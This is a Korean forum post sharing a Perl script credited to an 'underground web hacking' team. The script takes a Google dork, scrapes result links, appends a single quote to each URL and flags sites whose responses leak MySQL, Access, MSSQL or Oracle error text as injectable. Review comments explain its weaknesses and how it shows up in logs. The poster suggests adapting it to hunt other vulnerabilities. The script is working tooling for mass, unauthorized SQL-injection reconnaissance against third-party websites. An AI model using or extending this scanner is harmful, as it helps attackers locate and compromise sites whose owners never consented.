
[+] 유틸리티

Full MSSQL Injection PWNage

언더그라운드 웹해킹 전문 팀인 CWH 팀에 의해서 만들어진 것입니다.



#!/usr/bin/perl
 use LWP::Simple;
 use LWP::UserAgent;
 use HTTP::Request;
 # Purpose: interactive console script. Reads a search query ("dork") and a
 # page count from STDIN, fetches that many Google result pages, pulls the
 # result links out of the HTML, requests each link with a single quote
 # appended, and prints the link when the response body contains a known
 # database error string.
 #
 # Review notes (defensive reading of this listing):
 # - The visible preamble has no `use strict` / `use warnings`; apart from
 #   $sis, $dork and $page every variable below is an undeclared package global.
 # - The only signal the script has is database error text echoed back in the
 #   HTTP response. An application that uses parameterized queries and returns
 #   generic error pages gives it nothing to match.
 # - The requests it sends are recognisable in web-server logs: a fixed
 #   User-Agent of 'Mozilla 5.2' and a request URL that ends in a single quote.

 # Clear the terminal using the command that fits the host OS ($^O).
 my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
 print "+++++++++++++++++++++++++++++++\n";
 print "+     SQL - Google Search     +\n";
 print "+       CWH Underground       +\n";
 print "+++++++++++++++++++++++++++++++\n\n";
 # Operator input: the search query and how many result pages to walk.
 print "Insert Dork:";
 chomp( my $dork = <STDIN> );
 print "Total Query Pages (10 Links/Pages) :";
 chomp( my $page = <STDIN> );
 print "\n[+] Result:\n\n";
 # One iteration per result page; $start is the result offset (0, 10, 20, ...).
 # NOTE(review): the loop ends only when $start equals $page*10 exactly, so a
 # negative or fractional $page never satisfies the condition and the loop
 # does not terminate.
 for($start = 0;$start != $page*10;$start += 10)
 { 
 # Search URL is built by plain string concatenation of the operator's query.
 $t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
     # Fixed User-Agent string, 10-second timeout, proxy settings taken from
     # the environment (env_proxy).
     $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
     $ua->timeout(10);
     $ua->env_proxy;
     $response = $ua->get($t);
     # A failed search request is skipped silently; nothing is reported.
     if ($response->is_success)
     {
         $c = $response->content;
         # Cut the page at every '<a href=' so each chunk starts with a link target.
         @stuff = split(/<a href=/,$c);
         foreach $line(@stuff)
         {
             # Keep only chunks containing ' class=l' and capture the text before it.
             # Presumably this matched Google's result-anchor markup when the
             # script was written; TODO confirm against the markup in use.
             if($line =~/(.*) class=l/ig)
             {
                 $out = $1;
                 # Drop the double quotes that wrapped the href value.
                 $out =~ s/\"//g;
   # Append a single quote to the end of the URL; this is the probe that is
   # meant to break an unparameterized SQL string on the server side.
   $out =~s/$/\'/;   
   # A second user agent with the same settings is created for every link.
   # It overwrites $ua and $response from the outer loop; the search page
   # was already split into @stuff, so the outer iteration is unaffected.
   $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
   $ua->timeout(10);
   $ua->env_proxy;
   $response = $ua->get($out);
   # The body is inspected without an is_success check, so non-success
   # responses are matched as well.
   $error = $response->content();
   # Signature matching on leaked error text, first match wins. The patterns
   # are plain substrings; 'Warning:' in particular is broad and will also
   # match pages that merely contain that word, hence "Could be" in the output.
   if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
    {print "$out => Could be Vulnerable in MySQL Injection!!\n";}
   # Microsoft JET / Access ODBC driver error text.
   elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
    {print "$out => Could be Vulnerable in MS Access Injection!!\n";}
   # SQL Server OLE DB provider error text.
   elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
    {print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
   # Oracle OLE DB provider error text.
   elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
    {print "$out => Could be Vulnerable in Oracle Injection!!\n";}
      }
  }
     }
        }






문서 중 일부를 발췌한 것입니다.

GoogleD0rk 검색프로그램 소스입니다. (MSSQL Injection)

저도 만들고 있었는데 한발 늦었군요 ㅡㅡ;;

응용하여 다른 injection 취약점이나 다른 기법 취약점 검색프로그램으로 만들어도 될 것 같습니다.